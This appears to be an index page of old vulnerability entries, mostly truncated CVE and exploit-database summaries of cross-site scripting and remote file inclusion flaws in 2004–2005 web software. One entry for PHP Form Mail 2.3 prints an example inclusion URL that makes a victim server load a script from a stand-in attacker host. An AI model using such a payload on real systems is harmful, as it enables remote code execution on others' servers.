security flaw

Firefox before 1.0.3 and Mozilla Suite before 1.7.7 allows remote attackers to execute arbitrary script in other domains via a setter function for a variable in the target domain, which is executed when the user visits that domain, aka "Cross-site scripting through global scope pollution."...

CVE-2005-1308

SqWebMail allows remote attackers to inject arbitrary web script or HTML via CRLF sequences in the redirect parameter followed by the desired script or HTML...

CVE-2005-1000

Multiple cross-site scripting XSS vulnerabilities in PHP-Nuke 7.6 allow remote attackers to inject arbitrary web script or HTML via 1 the bid parameter to the EmailStats op in banners.pgp, 2 the ratenum parameter in the TopRated and MostPopular actions in the WebLinks module, 3 the ttitle paramet...

Alstrasoft EPay Pro 2.0 - Remote File Inclusion

source: https://www.securityfocus.com/bid/12973/info EPay Pro is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'view' parameter. An attacker may leverage this...

The Includer 1.01.1 - Remote File Inclusion

The Includer 1.01.1 - Remote File Inclusion source: https://www.securityfocus.com/bid/12926/info The Includer is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter. A...

The Includer 1.0/1.1 - Remote File Inclusion

source: https://www.securityfocus.com/bid/12926/info The Includer is reported prone to a remote file include vulnerability. The problem presents itself specifically when an attacker passes the location of a remote script through an affected parameter. An attacker may leverage this issue to execut...

PT-2005-1861 · Php · Php-Post

Name of the Vulnerable Software and Affected Versions: PHP-Post versions prior to 0.33 Description: A cross-site scripting XSS issue allows remote attackers to inject arbitrary web script or HTML. Recommendations: For versions prior to 0.33, update to version 0.33 or later to resolve the issue...

security flaw

Cross-site scripting XSS vulnerability in the driver script in mailman before 2.1.5 allows remote attackers to inject arbitrary web script or HTML via a URL, which is not properly escaped in the resulting error page...

CVE-2005-0723

Cross-site scripting XSS vulnerability in the jumpmenu function in functions.php for paFileDB 3.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the URL parameters, which is not properly cleansed in the $pageurl variable, as demonstrated using pafiledb.php...

CVE-2005-0656

Multiple cross-site scripting XSS vulnerabilities in auraCMS 1.5 allow remote attackers to inject arbitrary web script or HTML via the 1 hits parameter to hits.php, 2 query parameter to index.php, or 3 theCount parameter to counter.php...

CVE-2005-0674

Cross-site scripting XSS vulnerability in the News module for paBox 1.6 allows remote attackers to inject arbitrary web script or HTML via the text hidden parameter in an HTTP POST request...

CVE-2005-0660

Multiple cross-site scripting XSS vulnerabilities in D-Forum 1.11 allows remote attackers to inject arbitrary web script or HTML via certain fields, as demonstrated using the page parameter in nav.php3...

PHP Form Mail 2.3 - Arbitrary File Inclusion

Example: if registerglobals=on and allowurlfopen=on: http://victim/dir/inc/formmail.inc.php?scriptroot=http://hackerbox/ milw0rm.com 2005-03-05...

CVE-2005-0628

Multiple cross-site scripting XSS vulnerabilities in Forumwa 1.0 allow remote attackers to inject arbitrary web script or HTML via 1 the keyword parameter in search.php or the 2 body or 3 subject of a forum message...

CVE-2005-0641

Cross-site scripting XSS vulnerability in the Reporter for Computer Associates CA Unicenter Asset Management UAM 4.0 allows remote attackers to inject arbitrary HTML or web script via the 1 name or 2 description in a report template...

CVE-2004-1055

Multiple cross-site scripting XSS vulnerabilities in phpMyAdmin 2.6.0-pl2 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the PmaAbsoluteUri parameter, 2 the zerorows parameter in readdump.php, 3 the confirm form, or 4 an error message generated by the internal...

CVE-2005-0629

Multiple cross-site scripting XSS vulnerabilities in profile.php in 427BB 2.2 allow remote attackers to inject arbitrary web script or HTML via the 1 user or 2 Avatar parameters...

CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection

source: https://www.securityfocus.com/bid/12691/info A remote script injection vulnerability affects CutePHP CuteNews. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it to carry out critical functionality. An attacker may leverage this...

CVE-2004-1711

Cross-site scripting XSS vulnerability in post.php in Moodle before 1.3 allows remote attackers to inject arbitrary web script or HTML via the reply parameter...

CVE-2004-1730

Cross-site scripting XSS vulnerability in Mantis bugtracker allows remote attackers to inject arbitrary web script or HTML via 1 the return parameter to loginpage.php, 2 e-mail field in signup.php, 3 action parameter to loginselectprojpage.php, or 4 hidestatus parameter to viewallset.php...